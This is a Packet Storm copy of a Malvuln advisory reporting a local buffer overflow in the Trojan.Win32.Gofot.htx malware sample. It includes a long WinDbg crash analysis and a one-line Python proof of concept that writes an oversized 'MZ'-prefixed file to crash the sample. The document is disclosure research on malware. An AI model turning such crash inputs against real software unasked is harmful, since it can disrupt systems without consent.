exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Trojan.Win32.Gofot.htx MVID-2021-0110 Buffer Overflow

Trojan.Win32.Gofot.htx MVID-2021-0110 Buffer Overflow
Posted Feb 25, 2021
Authored by malvuln | Site malvuln.com

Trojan.Win32.Gofot.htx malware suffers from a buffer overflow vulnerability.

tags | exploit, overflow, trojan
systems | windows
SHA-256 | c5ae2398d25d74c8167d17ab5327fbca1934b8b0dd6644651e4d203affc64cce

Trojan.Win32.Gofot.htx MVID-2021-0110 Buffer Overflow

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/ae062bfe4abd59ac1b9be693fbc45f60.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan.Win32.Gofot.htx
Vulnerability: Local File Buffer Overflow
Description: HackerJLY PE Parser tool V1.0.1.8 doesnt properly check the files it loads which triggers a local buffer overflow. Analyzing the crash we can see an overwrite of the CX (16-bit) part of the ECX register with our 41414141 exploit pattern.
Type: PE32
MD5: ae062bfe4abd59ac1b9be693fbc45f60
Vuln ID: MVID-2021-0110
Dropped files:
ASLR: True
DEP: True
Safe SEH: True
Disclosure: 02/25/2021

Memory Dump:
0:000> dd cx
00004141 ???????? ???????? ???????? ????????

(1f60.100): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=45d84141 edx=0057e577 esi=00000003 edi=00000003
eip=7710ed3c esp=0057d9c8 ebp=0057db58 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400 ret 14h

0:000> .ecxr
eax=04970001 ebx=00000000 ecx=45d84141 edx=0057e577 esi=0057e3a0 edi=0057e570
eip=00dca142 esp=0057e34c ebp=0057e34c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
*** WARNING: Unable to verify checksum for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
*** ERROR: Module load completed but symbols could not be loaded for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142:
00dca142 813950450000 cmp dword ptr [ecx],4550h ds:002b:45d84141=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

*** WARNING: Unable to verify checksum for SkinH.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SkinH.dll -

FAULTING_IP:
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
00dca142 813950450000 cmp dword ptr [ecx],4550h

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00dca142 (Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x0000a142)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 45d84141
Attempt to read from address 45d84141

DEFAULT_BUCKET_ID: INVALID_POINTER_READ

PROCESS_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe

OVERLAPPED_MODULE: Address regions for 'd3d10warp' and 'resourcepolicyclient.dll' overlap

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000000

EXCEPTION_PARAMETER2: 45d84141

READ_ADDRESS: 45d84141

FOLLOWUP_IP:
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
00dca142 813950450000 cmp dword ptr [ecx],4550h

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00000100

PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ

BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ

LAST_CONTROL_TRANSFER: from 00dcab0f to 00dca142

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0057e34c 00dcab0f 0057e570 097c119a 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142
0057e37c 00dd0af8 046acc58 0057e577 097c1746 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xab0f
0057e5a0 00dd1d78 046acc58 097c1756 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10af8
0057e928 00df676d 00f2fe28 0057f7f0 0057e968 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x11d78
0057e938 00df697c 0057f7f0 000003e9 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3676d
0057e968 00ecb1a4 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3697c
0057e98c 00df3e09 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10b1a4
0057e9dc 00df96fe 00000000 0080072c 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x33e09
0057e9f0 00df4771 000003e9 0080072c 097c184e Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396fe
0057eaa8 00defe3e 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x34771
0057eac8 00df32bb 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe3e
0057eb3c 00df334a 0057f7f0 00d802be 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb
0057eb5c 76eee0bb 00d802be 00000111 000003e9 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a
0057eb88 76ef8849 00df3314 00d802be 00000111 user32!_InternalCallWinProc+0x2b
0057ebac 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20
0057ec7c 76ef833a 00df3314 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be
0057ecc0 76edf38b 00000111 000003e9 0080072c user32!CallWindowProcAorW+0xd4
0057ecd8 1002285c ffff04db 00d802be 00000111 user32!CallWindowProcA+0x1b
0057ed34 76ef8849 1001f2d0 00d802be 00000111 SkinH+0x2285c
0057ed58 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20
0057ee28 76ee8503 1001f2d0 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be
0057ee90 76ee8aa0 03027740 00000000 00000111 user32!DispatchClientMessage+0x1b3
0057eed8 77110bcd 0057eef4 00000020 0057f184 user32!__fnDWORD+0x50
0057ef10 73ee2a4c 76efa9fd 00d802be 00000111 ntdll!KiUserCallbackDispatcher+0x4d
0057ef14 76efa9fd 00d802be 00000111 000003e9 win32u!NtUserMessageCall+0xc
0057ef80 76edb95b 03027740 00000000 0080072c user32!SendMessageWorker+0x860
0057efa8 73836934 00d802be 00000111 000003e9 user32!SendMessageW+0x5b
0057efc8 738368f9 007286c0 00000202 00000000 comctl32!Button_NotifyParent+0x39
0057efe0 7384c14b 7384b890 0080072c 00000000 comctl32!Button_ReleaseCapture+0x9b
0057f074 76eee0bb 0080072c 00000202 00000000 comctl32!Button_WndProc+0x8bb
0057f0a0 76ef8849 7384b890 0080072c 00000202 user32!_InternalCallWinProc+0x2b
0057f0c4 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20
0057f194 76ef833a 7384b890 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be
0057f1d8 76edfbab 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4
0057f1f0 73a676f5 7384b890 0080072c 00000202 user32!CallWindowProcW+0x1b
0057f214 00defcc9 7384b890 0080072c 00000202 apphelp!DWM8AND16BitHook_CallWindowProcW+0x35
0057f234 00defe55 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fcc9
0057f250 00df32bb 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe55
0057f2c4 00df334a 0057f924 0080072c 00000202 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb
0057f2e4 76eee0bb 0080072c 00000202 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a
0057f310 76ef8849 00df3314 0080072c 00000202 user32!_InternalCallWinProc+0x2b
0057f334 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20
0057f404 76ef833a 00df3314 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be
0057f44c 76edf38b 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4
0057f464 10007514 ffff039b 0080072c 00000202 user32!CallWindowProcA+0x1b
0057f4d8 76ef8849 10011fd0 0080072c 00000202 SkinH+0x7514
0057f4fc 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20
0057f5cc 76ee90dc 10011fd0 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be
0057f638 76edb2ee 006f0588 00000000 00000100 user32!DispatchMessageWorker+0x4ac
0057f66c 00e0a996 00d802be 006f0588 097c0426 user32!IsDialogMessageW+0x17e
0057f6c0 00df5c7c 0057f7f0 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x4a996
0057f6d4 00df0cb5 006f0588 0057f6f4 00dee82c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x35c7c
0057f6e0 00dee82c 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x30cb5
0057f6f4 00df96b9 006f0588 00d802be 0057f718 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2e82c
0057f704 00df289a 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396b9
0057f718 00df7765 00d802be 006f0588 006f0558 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3289a
0057f730 00df78bf 006f0588 0057f748 00df77b0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x37765
0057f73c 00df77b0 006f0588 0057f780 00df790c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x378bf
0057f748 00df790c 006f0588 00000000 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x377b0
0057f780 00deeed5 00000004 097c052a 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3790c
0057f7cc 00dcf1f9 097c053e 00f61b48 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2eed5
0057fb44 00e20c1d 00fc7b10 00000000 00353000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xf1f9
0057fb58 00dd59c4 00dc0000 00000000 006e1eb8 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x60c1d
0057fbe8 76198654 00353000 76198630 1507c2ff Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x159c4
0057fbfc 77104a77 00353000 1fe72005 00000000 kernel32!BaseThreadInitThunk+0x24
0057fc44 77104a47 ffffffff 77129ece 00000000 ntdll!__RtlUserThreadStart+0x2f
0057fc54 00000000 00fc7b10 00353000 00000000 ntdll!_RtlUserThreadStart+0x1b


SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60

IMAGE_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 59b2a1cb

STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb

FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe!Unknown

BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142



Exploit/PoC:
python -c "print( 'MZ'+'A'*20000)" > pbarbar.exe


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close